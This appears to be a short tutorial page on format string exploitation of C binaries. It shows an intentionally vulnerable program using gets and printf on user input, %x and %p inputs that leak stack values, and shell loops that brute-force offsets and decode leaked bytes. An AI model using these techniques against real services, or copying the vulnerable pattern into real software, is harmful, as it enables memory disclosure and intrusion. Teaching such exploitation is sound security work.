icon

Binary Exploitation with Format String

Last modified: 2023-08-14

This exploitation occurs when a binary is affected a format string that attacker inputs.

Investigation

If a binary file contains the functionality which reads user input then outputs it, we can abuse format strings.

// example.c
int main()
{
    char buffer[12];

    gets(buffer);
    printf(buffer);

    return 0;
}

For example, input %x as below, then we get the value of stack as hex representation.

./example

# Input 1 (read value as hex)
%x
# output
ad8c72a1

# Input 2 (read multiple values as hex)
%x %x %x %x
# output
78252078 0 ceddc980 447c8d80 0

# Input 3 (read offset values as hex)
%1$x
# output
2431

# Input 4 (read offset values as hex)
%2$x
# output
0

# Input 5 (read pointer address)
%p
# output
0x55821afca2a1

# Input 6 (read offset pointer address)
%1$p
# output
2431

Exploitation

This is an example of exploitation with format string.
We can read pointer addresses/values by brute forcing.

# Brute force pointer
for i in {20..-1}; do echo \%$i\$p | ./example; done

# Brute force pointer & cut & hexdump (reverse) & reverse
# cut -c 15-: Select only N characters (e.g. 15 characters)
# xxd -ps: Output in plain hexdump style
# xxd -r: Reverse operation. Convert hexdump into binary
# rev: Reverse lines characterwise
(for i in {11..6..-1}; do echo \%$i\$p | ./example; done) | grep "The result is" | cut -c 15- | xxd -ps -r | rev